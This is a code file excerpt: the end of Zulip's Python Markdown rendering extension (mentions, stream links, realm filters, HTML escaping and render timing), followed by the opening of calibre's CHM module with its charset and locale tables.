        paragraph to be rendered as an unordered list

        Detects paragraphs that have a matching list item that comes
        directly after a line of text, and inserts a newline between
        to satisfy Markdown"""

    LI_RE = re.compile(u'^[ ]{0,3}[*][ ]+(.*)', re.MULTILINE)
    HANGING_ULIST_RE = re.compile(u'^.+\\n([ ]{0,3}[*][ ]+.*)', re.MULTILINE)

    def run(self, lines):
        # type: (List[Text]) -> List[Text]
        """ Insert a newline between a paragraph and ulist if missing """
        inserts = 0
        fence = None
        copy = lines[:]
        for i in range(len(lines) - 1):
            # Ignore anything that is inside a fenced code block
            m = FENCE_RE.match(lines[i])
            if not fence and m:
                fence = m.group('fence')
            elif fence and m and fence == m.group('fence'):
                fence = None

            # If we're not in a fenced block and we detect an upcoming list
            # hanging off a paragraph, add a newline
            if (not fence and lines[i] and
                    self.LI_RE.match(lines[i+1]) and
                    not self.LI_RE.match(lines[i])):
                # `inserts` tracks how far `copy`'s indices have drifted
                # from `lines`' as blank lines get inserted.
                copy.insert(i+inserts+1, '')
                inserts += 1
        return copy
# Based on markdown.inlinepatterns.LinkPattern
class LinkPattern(markdown.inlinepatterns.Pattern):
    """ Return a link element from the given match. """

    def handleMatch(self, m):
        # type: (Match[Text]) -> Optional[Element]
        raw_href = m.group(9)
        if not raw_href:
            return None

        # Angle-bracketed targets (<http://...>) get the brackets stripped.
        if raw_href.startswith("<"):
            raw_href = raw_href[1:-1]
        href = sanitize_url(self.unescape(raw_href.strip()))
        if href is None:
            return None

        anchor = markdown.util.etree.Element('a')
        anchor.text = m.group(2)
        anchor.set('href', href)
        # Fragment-only links stay in the current tab.
        fixup_link(anchor, target_blank=(href[:1] != '#'))
        return anchor
def prepare_realm_pattern(source):
    # type: (Text) -> Text
    """ Augment a realm filter so it only matches after start-of-string,
    whitespace, or opening delimiters, won't match if there are word
    characters directly after, and saves what was matched as "name". """
    # The suffix must be a raw string: '\w' inside a plain string literal is
    # an invalid escape sequence (DeprecationWarning, and an error on newer
    # Pythons). The resulting value is unchanged.
    return r"""(?<![^\s'"\(,:<])(?P<name>""" + source + r')(?!\w)'
# Given a regular expression pattern, linkifies groups that match it
# using the provided format string to construct the URL.
class RealmFilterPattern(markdown.inlinepatterns.Pattern):
    """ Applied a given realm filter to the input """

    def __init__(self, source_pattern, format_string, markdown_instance=None):
        # type: (Text, Text, Optional[markdown.Markdown]) -> None
        self.pattern = prepare_realm_pattern(source_pattern)
        self.format_string = format_string
        markdown.inlinepatterns.Pattern.__init__(self, self.pattern, markdown_instance)

    def handleMatch(self, m):
        # type: (Match[Text]) -> Union[Element, Text]
        # Substitute the named groups the filter captured into the URL
        # format string, linking the text matched by the "name" group.
        link_url = self.format_string % m.groupdict()
        return url_to_a(link_url, m.group("name"))
class UserMentionPattern(markdown.inlinepatterns.Pattern):
    # Renders @-mentions and records mentioned user ids on
    # `current_message` (a module global set up per render).
    def find_user_for_mention(self, name):
        # type: (Text) -> Tuple[bool, Dict[str, Any]]
        # Returns (is_wildcard, user-dict-or-None).
        if db_data is None:
            return (False, None)

        if mention.user_mention_matches_wildcard(name):
            return (True, None)

        # Look the name up first as a full name, then as a short name.
        user = db_data['full_names'].get(name.lower(), None)
        if user is None:
            user = db_data['short_names'].get(name.lower(), None)
        return (False, user)

    def handleMatch(self, m):
        # type: (Match[Text]) -> Optional[Element]
        name = m.group(2) or m.group(3)

        if current_message:
            wildcard, user = self.find_user_for_mention(name)

            if wildcard:
                current_message.mentions_wildcard = True
                # "*" marks an everyone/wildcard mention for the client.
                email = "*"
            elif user:
                current_message.mentions_user_ids.add(user['id'])
                # Canonicalize the displayed name to the user's full name.
                name = user['full_name']
                email = user['email']
            else:
                # Don't highlight @mentions that don't refer to a valid user
                return None

            el = markdown.util.etree.Element("span")
            el.set('class', 'user-mention')
            el.set('data-user-email', email)
            el.text = "@%s" % (name,)
            return el
class StreamPattern(VerbosePattern):
    """Turns #stream_name syntax into a link to that stream's narrow."""

    def find_stream_by_name(self, name):
        # type: (Match[Text]) -> Dict[str, Any]
        # `db_data` is a per-render module global; None outside a render.
        if db_data is None:
            return None
        return db_data['stream_names'].get(name)

    def handleMatch(self, m):
        # type: (Match[Text]) -> Optional[Element]
        name = m.group('stream_name')

        if not current_message:
            return None
        stream = self.find_stream_by_name(name)
        if stream is None:
            return None

        el = markdown.util.etree.Element('a')
        el.set('class', 'stream')
        el.set('data-stream-id', str(stream['id']))
        # TODO: We should quite possibly not be specifying the
        # href here and instead having the browser auto-add the
        # href when it processes a message with one of these, to
        # provide more clarity to API clients.
        el.set('href', '/#narrow/stream/{stream_name}'.format(
            stream_name=urllib.parse.quote(force_str(name))))
        el.text = u'#{stream_name}'.format(stream_name=name)
        return el
class AlertWordsNotificationProcessor(markdown.preprocessors.Preprocessor):
    # Scans message content for users' alert words, recording hits on
    # current_message.alert_words; the rendered output is not modified.
    def run(self, lines):
        # type: (Iterable[Text]) -> Iterable[Text]
        if current_message and db_data is not None:
            # We check for custom alert words here, the set of which are
            # dependent on which users may see this message.
            #
            # Our caller passes in the list of possible_words.  We
            # don't do any special rendering; we just append the alert words
            # we find to the set current_message.alert_words.

            realm_words = db_data['possible_words']

            content = '\n'.join(lines).lower()

            # A word only counts when bounded by whitespace, start/end of
            # content, or common punctuation on both sides.
            allowed_before_punctuation = "|".join([r'\s', '^', r'[\(\".,\';\[\*`>]'])
            allowed_after_punctuation = "|".join([r'\s', '$', r'[\)\"\?:.,\';\]!\*`]'])

            for word in realm_words:
                escaped = re.escape(word.lower())
                match_re = re.compile(u'(?:%s)%s(?:%s)' %
                                      (allowed_before_punctuation,
                                       escaped,
                                       allowed_after_punctuation))
                if re.search(match_re, content):
                    current_message.alert_words.add(word)

        return lines
# This prevents realm_filters from running on the content of a
# Markdown link, breaking up the link. This is a monkey-patch, but it
# might be worth sending a version of this change upstream.
class AtomicLinkPattern(LinkPattern):
    """LinkPattern variant that marks the link text as an AtomicString so
    that later inline patterns (e.g. realm_filters) do not re-process it
    and break the link apart."""

    def handleMatch(self, m):
        # type: (Match[Text]) -> Optional[Element]
        ret = LinkPattern.handleMatch(self, m)
        if ret is None:
            return None
        # Only Element results carry .text; plain strings pass through.
        if not isinstance(ret, six.string_types):
            ret.text = markdown.util.AtomicString(ret.text)
        return ret
class Bugdown(markdown.Extension):
    """Zulip's main python-markdown extension: removes most stock inline
    patterns/processors and installs Zulip-specific ones (mentions,
    streams, emoji, realm filters, custom emphasis/link/URL handling)."""

    def __init__(self, *args, **kwargs):
        # type: (*Any, **Union[bool, None, Text]) -> None
        # define default configs
        self.config = {
            "realm_filters": [kwargs['realm_filters'], "Realm-specific filters for domain"],
            "realm": [kwargs['realm'], "Realm name"]
        }

        super(Bugdown, self).__init__(*args, **kwargs)

    def extendMarkdown(self, md, md_globals):
        # type: (markdown.Markdown, Dict[str, Any]) -> None
        del md.preprocessors['reference']

        # Remove the stock inline patterns that Zulip replaces (or
        # deliberately does not support).
        for k in ('image_link', 'image_reference', 'automail',
                  'autolink', 'link', 'reference', 'short_reference',
                  'escape', 'strong_em', 'emphasis', 'emphasis2',
                  'linebreak', 'strong'):
            del md.inlinePatterns[k]
        try:
            # linebreak2 was removed upstream in version 3.2.1, so
            # don't throw an error if it is not there
            del md.inlinePatterns['linebreak2']
        except Exception:
            pass

        md.preprocessors.add("custom_text_notifications", AlertWordsNotificationProcessor(md), "_end")

        # Custom bold syntax: **foo** but not __foo__
        md.inlinePatterns.add('strong',
                              markdown.inlinepatterns.SimpleTagPattern(r'(\*\*)([^\n]+?)\2', 'strong'),
                              '>not_strong')

        # Custom strikethrough syntax: ~~foo~~
        md.inlinePatterns.add('del',
                              markdown.inlinepatterns.SimpleTagPattern(r'(?<!~)(\~\~)([^~{0}\n]+?)\2(?!~)', 'del'),
                              '>strong')

        # Text inside ** must start and end with a word character;
        # needed for things like "const char *x = (char *)y"
        md.inlinePatterns.add(
            'emphasis',
            markdown.inlinepatterns.SimpleTagPattern(r'(\*)(?!\s+)([^\*^\n]+)(?<!\s)\*', 'em'),
            '>strong')

        for k in ('hashheader', 'setextheader', 'olist', 'ulist'):
            del md.parser.blockprocessors[k]

        md.parser.blockprocessors.add('ulist', UListProcessor(md.parser), '>hr')

        # Note that !gravatar syntax should be deprecated long term.
        md.inlinePatterns.add('avatar', Avatar(r'!avatar\((?P<email>[^)]*)\)'), '>backtick')
        md.inlinePatterns.add('gravatar', Avatar(r'!gravatar\((?P<email>[^)]*)\)'), '>backtick')

        md.inlinePatterns.add('stream_subscribe_button',
                              StreamSubscribeButton(r'!_stream_subscribe_button\((?P<stream_name>(?:[^)\\]|\\\)|\\)*)\)'), '>backtick')
        md.inlinePatterns.add(
            'modal_link',
            ModalLink(r'!modal_link\((?P<relative_url>[^)]*), (?P<text>[^)]*)\)'),
            '>avatar')

        md.inlinePatterns.add('usermention', UserMentionPattern(mention.find_mentions), '>backtick')

        # Verbose-mode regex for #**stream** references.
        stream_group = r"""
                        (?<![^\s'"\(,:<])            # Start after whitespace or specified chars
                        \#\*\*                       # and after hash sign followed by double asterisks
                            (?P<stream_name>[^\*]+)  # stream name can contain anything
                        \*\*                         # ends by double asterisks
                       """
        md.inlinePatterns.add('stream', StreamPattern(stream_group), '>backtick')
        md.inlinePatterns.add('emoji', Emoji(r'(?P<syntax>:[\w\-\+]+:)'), '_end')

        md.inlinePatterns.add('unicodeemoji', UnicodeEmoji(
            u'(?P<syntax>[\U0001F300-\U0001F64F\U0001F680-\U0001F6FF\u2600-\u26FF\u2700-\u27BF])'),
            '_end')
        # The equivalent JS regex is \ud83c[\udf00-\udfff]|\ud83d[\udc00-\ude4f]|\ud83d[\ude80-\udeff]|
        # [\u2600-\u26FF]|[\u2700-\u27BF]. See below comments for explanation. The JS regex is used
        # by marked.js for frontend unicode emoji processing.
        # The JS regex \ud83c[\udf00-\udfff]|\ud83d[\udc00-\ude4f] represents U0001F300-\U0001F64F
        # The JS regex \ud83d[\ude80-\udeff] represents \U0001F680-\U0001F6FF
        # Similarly [\u2600-\u26FF]|[\u2700-\u27BF] represents \u2600-\u26FF\u2700-\u27BF

        md.inlinePatterns.add('link', AtomicLinkPattern(markdown.inlinepatterns.LINK_RE, md), '>avatar')

        for (pattern, format_string, id) in self.getConfig("realm_filters"):
            md.inlinePatterns.add('realm_filters/%s' % (pattern,),
                                  RealmFilterPattern(pattern, format_string), '>link')

        # A link starts at a word boundary, and ends at space, punctuation, or end-of-input.
        #
        # We detect a url either by the `https?://` or by building around the TLD.
        # In lieu of having a recursive regex (which python doesn't support) to match
        # arbitrary numbers of nested matching parenthesis, we manually build a regexp that
        # can match up to six
        # The inner_paren_contents chunk matches the innermore non-parenthesis-holding text,
        # and the paren_group matches text with, optionally, a matching set of parens
        inner_paren_contents = r"[^\s()\"]*"
        paren_group = r"""
                        [^\s()\"]*?            # Containing characters that won't end the URL
                        (?: \( %s \)           # and more characters in matched parens
                            [^\s()\"]*?        # followed by more characters
                        )*                     # zero-or-more sets of paired parens
                       """
        nested_paren_chunk = paren_group
        for i in range(6):
            nested_paren_chunk = nested_paren_chunk % (paren_group,)
        nested_paren_chunk = nested_paren_chunk % (inner_paren_contents,)

        tlds = '|'.join(list_of_tlds())
        link_regex = r"""
            (?<![^\s'"\(,:<])    # Start after whitespace or specified chars
                                 # (Double-negative lookbehind to allow start-of-string)
            (?P<url>             # Main group
                (?:(?:           # Domain part
                    https?://[\w.:@-]+?   # If it has a protocol, anything goes.
                   |(?:                   # Or, if not, be more strict to avoid false-positives
                        (?:[\w-]+\.)+     # One or more domain components, separated by dots
                        (?:%s)            # TLDs (filled in via format from tlds-alpha-by-domain.txt)
                    )
                )
                (?:/             # A path, beginning with /
                    %s           # zero-to-6 sets of paired parens
                )?)              # Path is optional
                | (?:[\w.-]+\@[\w.-]+\.[\w]+) # Email is separate, since it can't have a path
                %s               # File path start with file:///, enable by setting ENABLE_FILE_LINKS=True
            )
            (?=                            # URL must be followed by (not included in group)
                [!:;\?\),\.\'\"\>]*        # Optional punctuation characters
                (?:\Z|\s)                  # followed by whitespace or end of string
            )
            """ % (tlds, nested_paren_chunk,
                   r"| (?:file://(/[^/ ]*)+/?)" if settings.ENABLE_FILE_LINKS else r"")
        md.inlinePatterns.add('autolink', AutoLink(link_regex), '>link')

        md.preprocessors.add('hanging_ulists',
                             BugdownUListPreprocessor(md),
                             "_begin")

        md.treeprocessors.add("inline_interesting_links", InlineInterestingLinkProcessor(md, self), "_end")

        if settings.CAMO_URI:
            md.treeprocessors.add("rewrite_to_https", InlineHttpsProcessor(md), "_end")

        if self.getConfig("realm") == "zephyr_mirror":
            # Disable almost all inline patterns for zephyr mirror
            # users' traffic that is mirrored. Note that
            # inline_interesting_links is a treeprocessor and thus is
            # not removed
            for k in list(md.inlinePatterns.keys()):
                if k not in ["autolink"]:
                    del md.inlinePatterns[k]
            for k in list(md.treeprocessors.keys()):
                if k not in ["inline_interesting_links", "inline", "rewrite_to_https"]:
                    del md.treeprocessors[k]
            for k in list(md.preprocessors.keys()):
                if k not in ["custom_text_notifications"]:
                    del md.preprocessors[k]
            for k in list(md.parser.blockprocessors.keys()):
                if k not in ["paragraph"]:
                    del md.parser.blockprocessors[k]
# One Markdown engine per realm domain (plus 'default' and 'zephyr_mirror'),
# and the realm_filters each engine was built from, so that
# maybe_update_realm_filters() can detect when a rebuild is needed.
md_engines = {}
realm_filter_data = {} # type: Dict[Text, List[Tuple[Text, Text, int]]]
class EscapeHtml(markdown.Extension):
    """Disable raw-HTML passthrough: with the stock html_block preprocessor
    and html inline pattern removed, literal HTML in the input is escaped
    instead of being emitted as markup."""

    def extendMarkdown(self, md, md_globals):
        # type: (markdown.Markdown, Dict[str, Any]) -> None
        for key, registry in (('html_block', md.preprocessors),
                              ('html', md.inlinePatterns)):
            del registry[key]
def make_md_engine(key, opts):
    # type: (Text, Dict[str, Any]) -> None
    """Build a fresh Markdown engine for *key* (a realm domain) from
    *opts* (the markdown-style config dict of [value, help] pairs) and
    register it in the global md_engines table, replacing any previous
    engine for that key."""
    md_engines[key] = markdown.Markdown(
        output_format = 'html',
        extensions    = [
            'markdown.extensions.nl2br',
            'markdown.extensions.tables',
            codehilite.makeExtension(
                linenums=False,
                guess_lang=False
            ),
            fenced_code.makeExtension(),
            EscapeHtml(),
            Bugdown(realm_filters=opts["realm_filters"][0],
                    realm=opts["realm"][0])])
def subject_links(domain, subject):
    # type: (Text, Text) -> List[Text]
    """Return the URLs produced by applying *domain*'s realm filters to
    *subject*.

    Each realm filter is a (pattern, url_format_string, id) tuple; every
    regex match in the subject contributes one URL built by interpolating
    the match's named groups into the format string.

    Fixes: dropped the unused function-local imports (get_realm,
    RealmFilter) and replaced `matches += [x]` with the idiomatic append.
    """
    from zerver.models import realm_filters_for_domain

    matches = []  # type: List[Text]
    for realm_filter in realm_filters_for_domain(domain):
        pattern = prepare_realm_pattern(realm_filter[0])
        for m in re.finditer(pattern, subject):
            matches.append(realm_filter[1] % m.groupdict())
    return matches
def make_realm_filters(domain, filters):
    # type: (Text, List[Tuple[Text, Text, int]]) -> None
    """Record *filters* for *domain* and (re)build its Markdown engine,
    discarding any previously cached engine for that domain."""
    global md_engines, realm_filter_data

    # Drop the stale engine, if one exists, before rebuilding.
    md_engines.pop(domain, None)
    realm_filter_data[domain] = filters

    # Because of how the Markdown config API works, this has confusing
    # large number of layers of dicts/arrays :(
    opts = {"realm_filters": [filters, "Realm-specific filters for %s" % (domain,)],
            "realm": [domain, "Realm name"]}
    make_md_engine(domain, opts)
def maybe_update_realm_filters(domain):
    # type: (Optional[Text]) -> None
    """Ensure the Markdown engine(s) for *domain* exist and are current.

    With domain=None, (re)builds engines for every realm plus the
    'default' and 'zephyr_mirror' pseudo-domains.  Otherwise only
    rebuilds *domain*'s engine, and only if its filters changed.
    """
    from zerver.models import realm_filters_for_domain, all_realm_filters

    # If domain is None, load all filters
    if domain is None:
        all_filters = all_realm_filters()
        all_filters['default'] = []
        # Note: the loop variable deliberately rebinds `domain`; the
        # parameter is known to be None on this branch, so nothing is lost.
        for domain, filters in six.iteritems(all_filters):
            make_realm_filters(domain, filters)
        # Hack to ensure that getConfig("realm") is right for mirrored Zephyrs
        make_realm_filters("zephyr_mirror", [])
    else:
        realm_filters = realm_filters_for_domain(domain)
        if domain not in realm_filter_data or realm_filter_data[domain] != realm_filters:
            # Data has changed, re-load filters
            make_realm_filters(domain, realm_filters)
# We want to log Markdown parser failures, but shouldn't log the actual input
# message for privacy reasons. The compromise is to replace all alphanumeric
# characters with 'x'.
#
# We also use repr() to improve reproducibility, and to escape terminal control
# codes, which can do surprisingly nasty things.
# Matches any single word character (Unicode-aware).
_privacy_re = re.compile(u'\\w', flags=re.UNICODE)

def _sanitize_for_log(content):
    # type: (Text) -> Text
    """Replace every word character in *content* with 'x' and repr() the
    result, so message text can be logged without leaking its content."""
    return repr(_privacy_re.sub('x', content))
# Filters such as UserMentionPattern need a message, but python-markdown
# provides no way to pass extra params through to a pattern. Thus, a global.
current_message = None # type: Optional[Message]

# We avoid doing DB queries in our markdown thread to avoid the overhead of
# opening a new DB connection. These connections tend to live longer than the
# threads themselves, as well.
db_data = None # type: Optional[Dict[Text, Any]]
def log_bugdown_error(msg):
    # type: (str) -> None
    """We use this unusual logging approach to log the bugdown error, in
    order to prevent AdminZulipHandler from sending the sanitized
    original markdown formatting into another Zulip message, which
    could cause an infinite exception loop."""
    # Using the root logger directly bypasses any handlers attached to
    # this module's logger.
    logging.getLogger('').error(msg)
def do_convert(content, realm_domain=None, message=None, possible_words=None):
    # type: (Text, Optional[Text], Optional[Message], Optional[Set[Text]]) -> Optional[Text]
    """Convert Markdown to HTML, with Zulip-specific settings and hacks.

    Sets the module globals current_message/db_data for the duration of
    the render (the inline patterns read them) and always clears them in
    the finally block.  Raises BugdownRenderingException on any failure,
    after logging and notifying admins.
    """
    from zerver.models import get_active_user_dicts_in_realm, get_active_streams, UserProfile

    if message:
        maybe_update_realm_filters(message.get_realm().domain)

    # Pick the realm-specific engine, falling back to 'default'
    # (building it on first use).
    if realm_domain in md_engines:
        _md_engine = md_engines[realm_domain]
    else:
        if 'default' not in md_engines:
            maybe_update_realm_filters(domain=None)
        _md_engine = md_engines["default"]
    # Reset the parser; otherwise it will get slower over time.
    _md_engine.reset()

    global current_message
    current_message = message

    # Pre-fetch data from the DB that is used in the bugdown thread
    global db_data
    if message:
        realm_users = get_active_user_dicts_in_realm(message.get_realm())
        realm_streams = get_active_streams(message.get_realm()).values('id', 'name')

        if possible_words is None:
            possible_words = set() # type: Set[Text]

        db_data = {'possible_words': possible_words,
                   'full_names': dict((user['full_name'].lower(), user) for user in realm_users),
                   'short_names': dict((user['short_name'].lower(), user) for user in realm_users),
                   'emoji': message.get_realm().get_emoji(),
                   'stream_names': dict((stream['name'], stream) for stream in realm_streams)}

    try:
        # Spend at most 5 seconds rendering.
        # Sometimes Python-Markdown is really slow; see
        # https://trac.zulip.net/ticket/345
        return timeout(5, _md_engine.convert, content)
    except:
        # NOTE(review): a bare except also catches KeyboardInterrupt and
        # SystemExit.  Nothing is swallowed (we re-raise as
        # BugdownRenderingException below), but `except Exception:` would
        # be safer.
        from zerver.lib.actions import internal_send_message

        cleaned = _sanitize_for_log(content)

        # Output error to log as well as sending a zulip and email
        log_bugdown_error('Exception in Markdown parser: %sInput (sanitized) was: %s'
                          % (traceback.format_exc(), cleaned))
        subject = "Markdown parser failure on %s" % (platform.node(),)
        if settings.ERROR_BOT is not None:
            internal_send_message(settings.ERROR_BOT, "stream",
                                  "errors", subject, "Markdown parser failed, email sent with details.")
        mail.mail_admins(subject, "Failed message: %s\n\n%s\n\n" % (
                                    cleaned, traceback.format_exc()),
                         fail_silently=False)
        raise BugdownRenderingException()
    finally:
        # Always clear the globals so state cannot leak between messages.
        current_message = None
        db_data = None
# Simple wall-clock accounting of time spent rendering bugdown.
bugdown_time_start = 0.0
bugdown_total_time = 0.0
bugdown_total_requests = 0

def get_bugdown_time():
    # type: () -> float
    """Total seconds spent rendering since process start."""
    return bugdown_total_time

def get_bugdown_requests():
    # type: () -> int
    """Number of renders timed so far."""
    return bugdown_total_requests

def bugdown_stats_start():
    # type: () -> None
    """Record the start time of a render."""
    global bugdown_time_start
    bugdown_time_start = time.time()

def bugdown_stats_finish():
    # type: () -> None
    """Record the end of a render and accumulate the totals."""
    global bugdown_total_time
    global bugdown_total_requests
    global bugdown_time_start
    bugdown_total_requests += 1
    bugdown_total_time += (time.time() - bugdown_time_start)
def convert(content, realm_domain=None, message=None, possible_words=None):
    # type: (Text, Optional[Text], Optional[Message], Optional[Set[Text]]) -> Optional[Text]
    """Render *content* exactly like do_convert(), while recording the
    render in the bugdown timing statistics."""
    bugdown_stats_start()
    rendered = do_convert(content, realm_domain, message, possible_words)
    bugdown_stats_finish()
    return rendered
|
peguin40/zulip
|
zerver/lib/bugdown/__init__.py
|
Python
|
apache-2.0
| 54,643
|
# Copyright (C) 2003-2006 Rubens Ramos <rubensr@users.sourceforge.net>
# Based on code by:
# Copyright (C) 2003 Razvan Cojocaru <razvanco@gmx.net>
# pychm is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
# $Id: chm.py,v 1.12 2006/08/07 12:31:51 rubensr Exp $
'''
chm - A high-level front end for the chmlib python module.
The chm module provides high level access to the functionality
included in chmlib. It encapsulates functions in the CHMFile class, and
provides some additional features, such as the ability to obtain
the contents tree of a CHM archive.
'''
import array
import string
import sys
import codecs
import calibre.utils.chm.chmlib as chmlib
from calibre.constants import plugins
# Load the compiled helper plugin (used for full-text search and LCID
# detection below); fail loudly if it is unavailable.
extra, extra_err = plugins['chm_extra']
if extra_err:
    raise RuntimeError('Failed to load chm.extra: '+extra_err)
# Maps the Windows charset byte found in CHM metadata to the equivalent
# Python codec name (None where no reasonable mapping exists).
charset_table = {
    0   : 'iso8859_1',  # ANSI_CHARSET
    238 : 'iso8859_2',  # EASTEUROPE_CHARSET
    178 : 'iso8859_6',  # ARABIC_CHARSET
    161 : 'iso8859_7',  # GREEK_CHARSET
    177 : 'iso8859_8',  # HEBREW_CHARSET
    162 : 'iso8859_9',  # TURKISH_CHARSET
    222 : 'iso8859_11', # THAI_CHARSET - hmm not in python 2.2...
    186 : 'iso8859_13', # BALTIC_CHARSET
    204 : 'cp1251',     # RUSSIAN_CHARSET
    255 : 'cp437',      # OEM_CHARSET
    128 : 'cp932',      # SHIFTJIS_CHARSET
    134 : 'cp936',      # GB2312_CHARSET
    129 : 'cp949',      # HANGUL_CHARSET
    136 : 'cp950',      # CHINESEBIG5_CHARSET
    1   : None,         # DEFAULT_CHARSET
    2   : None,         # SYMBOL_CHARSET
    130 : None,         # JOHAB_CHARSET
    163 : None,         # VIETNAMESE_CHARSET
    77  : None,         # MAC_CHARSET
}

# Maps a Windows locale id (LCID) to a (python codec, language name,
# region/script group) tuple; codec is None where no mapping exists.
locale_table = {
    0x0436 : ('iso8859_1', "Afrikaans", "Western Europe & US"),
    0x041c : ('iso8859_2', "Albanian", "Central Europe"),
    0x0401 : ('iso8859_6', "Arabic_Saudi_Arabia", "Arabic"),
    0x0801 : ('iso8859_6', "Arabic_Iraq", "Arabic"),
    0x0c01 : ('iso8859_6', "Arabic_Egypt", "Arabic"),
    0x1001 : ('iso8859_6', "Arabic_Libya", "Arabic"),
    0x1401 : ('iso8859_6', "Arabic_Algeria", "Arabic"),
    0x1801 : ('iso8859_6', "Arabic_Morocco", "Arabic"),
    0x1c01 : ('iso8859_6', "Arabic_Tunisia", "Arabic"),
    0x2001 : ('iso8859_6', "Arabic_Oman", "Arabic"),
    0x2401 : ('iso8859_6', "Arabic_Yemen", "Arabic"),
    0x2801 : ('iso8859_6', "Arabic_Syria", "Arabic"),
    0x2c01 : ('iso8859_6', "Arabic_Jordan", "Arabic"),
    0x3001 : ('iso8859_6', "Arabic_Lebanon", "Arabic"),
    0x3401 : ('iso8859_6', "Arabic_Kuwait", "Arabic"),
    0x3801 : ('iso8859_6', "Arabic_UAE", "Arabic"),
    0x3c01 : ('iso8859_6', "Arabic_Bahrain", "Arabic"),
    0x4001 : ('iso8859_6', "Arabic_Qatar", "Arabic"),
    0x042b : (None, "Armenian","Armenian"),
    0x042c : ('iso8859_9', "Azeri_Latin", "Turkish"),
    0x082c : ('cp1251', "Azeri_Cyrillic", "Cyrillic"),
    0x042d : ('iso8859_1', "Basque", "Western Europe & US"),
    0x0423 : ('cp1251', "Belarusian", "Cyrillic"),
    0x0402 : ('cp1251', "Bulgarian", "Cyrillic"),
    0x0403 : ('iso8859_1', "Catalan", "Western Europe & US"),
    0x0404 : ('cp950', "Chinese_Taiwan", "Traditional Chinese"),
    0x0804 : ('cp936', "Chinese_PRC", "Simplified Chinese"),
    0x0c04 : ('cp950', "Chinese_Hong_Kong", "Traditional Chinese"),
    0x1004 : ('cp936', "Chinese_Singapore", "Simplified Chinese"),
    0x1404 : ('cp950', "Chinese_Macau", "Traditional Chinese"),
    0x041a : ('iso8859_2', "Croatian", "Central Europe"),
    0x0405 : ('iso8859_2', "Czech", "Central Europe"),
    0x0406 : ('iso8859_1', "Danish", "Western Europe & US"),
    0x0413 : ('iso8859_1', "Dutch_Standard", "Western Europe & US"),
    0x0813 : ('iso8859_1', "Dutch_Belgian", "Western Europe & US"),
    0x0409 : ('iso8859_1', "English_United_States", "Western Europe & US"),
    0x0809 : ('iso8859_1', "English_United_Kingdom", "Western Europe & US"),
    0x0c09 : ('iso8859_1', "English_Australian", "Western Europe & US"),
    0x1009 : ('iso8859_1', "English_Canadian", "Western Europe & US"),
    0x1409 : ('iso8859_1', "English_New_Zealand", "Western Europe & US"),
    0x1809 : ('iso8859_1', "English_Irish", "Western Europe & US"),
    0x1c09 : ('iso8859_1', "English_South_Africa", "Western Europe & US"),
    0x2009 : ('iso8859_1', "English_Jamaica", "Western Europe & US"),
    0x2409 : ('iso8859_1', "English_Caribbean", "Western Europe & US"),
    0x2809 : ('iso8859_1', "English_Belize", "Western Europe & US"),
    0x2c09 : ('iso8859_1', "English_Trinidad", "Western Europe & US"),
    0x3009 : ('iso8859_1', "English_Zimbabwe", "Western Europe & US"),
    0x3409 : ('iso8859_1', "English_Philippines", "Western Europe & US"),
    0x0425 : ('iso8859_13',"Estonian", "Baltic",),
    0x0438 : ('iso8859_1', "Faeroese", "Western Europe & US"),
    0x0429 : ('iso8859_6', "Farsi", "Arabic"),
    0x040b : ('iso8859_1', "Finnish", "Western Europe & US"),
    0x040c : ('iso8859_1', "French_Standard", "Western Europe & US"),
    0x080c : ('iso8859_1', "French_Belgian", "Western Europe & US"),
    0x0c0c : ('iso8859_1', "French_Canadian", "Western Europe & US"),
    0x100c : ('iso8859_1', "French_Swiss", "Western Europe & US"),
    0x140c : ('iso8859_1', "French_Luxembourg", "Western Europe & US"),
    0x180c : ('iso8859_1', "French_Monaco", "Western Europe & US"),
    0x0437 : (None, "Georgian", "Georgian"),
    0x0407 : ('iso8859_1', "German_Standard", "Western Europe & US"),
    0x0807 : ('iso8859_1', "German_Swiss", "Western Europe & US"),
    0x0c07 : ('iso8859_1', "German_Austrian", "Western Europe & US"),
    0x1007 : ('iso8859_1', "German_Luxembourg", "Western Europe & US"),
    0x1407 : ('iso8859_1', "German_Liechtenstein", "Western Europe & US"),
    0x0408 : ('iso8859_7', "Greek", "Greek"),
    0x040d : ('iso8859_8', "Hebrew", "Hebrew"),
    0x0439 : (None, "Hindi", "Indic"),
    0x040e : ('iso8859_2', "Hungarian", "Central Europe"),
    0x040f : ('iso8859_1', "Icelandic", "Western Europe & US"),
    0x0421 : ('iso8859_1', "Indonesian", "Western Europe & US"),
    0x0410 : ('iso8859_1', "Italian_Standard", "Western Europe & US"),
    0x0810 : ('iso8859_1', "Italian_Swiss", "Western Europe & US"),
    0x0411 : ('cp932', "Japanese", "Japanese"),
    0x043f : ('cp1251', "Kazakh", "Cyrillic"),
    0x0457 : (None, "Konkani", "Indic"),
    0x0412 : ('cp949', "Korean", "Korean"),
    0x0426 : ('iso8859_13',"Latvian", "Baltic",),
    0x0427 : ('iso8859_13',"Lithuanian", "Baltic",),
    0x042f : ('cp1251', "Macedonian", "Cyrillic"),
    0x043e : ('iso8859_1', "Malay_Malaysia", "Western Europe & US"),
    0x083e : ('iso8859_1', "Malay_Brunei_Darussalam", "Western Europe & US"),
    0x044e : (None, "Marathi", "Indic"),
    0x0414 : ('iso8859_1', "Norwegian_Bokmal", "Western Europe & US"),
    0x0814 : ('iso8859_1', "Norwegian_Nynorsk", "Western Europe & US"),
    0x0415 : ('iso8859_2', "Polish", "Central Europe"),
    0x0416 : ('iso8859_1', "Portuguese_Brazilian", "Western Europe & US"),
    0x0816 : ('iso8859_1', "Portuguese_Standard", "Western Europe & US"),
    0x0418 : ('iso8859_2', "Romanian", "Central Europe"),
    0x0419 : ('cp1251', "Russian", "Cyrillic"),
    0x044f : (None, "Sanskrit", "Indic"),
    0x081a : ('iso8859_2', "Serbian_Latin", "Central Europe"),
    0x0c1a : ('cp1251', "Serbian_Cyrillic", "Cyrillic"),
    0x041b : ('iso8859_2', "Slovak", "Central Europe"),
    0x0424 : ('iso8859_2', "Slovenian", "Central Europe"),
    0x040a : ('iso8859_1', "Spanish_Trad_Sort", "Western Europe & US"),
    0x080a : ('iso8859_1', "Spanish_Mexican", "Western Europe & US"),
    0x0c0a : ('iso8859_1', "Spanish_Modern_Sort", "Western Europe & US"),
    0x100a : ('iso8859_1', "Spanish_Guatemala", "Western Europe & US"),
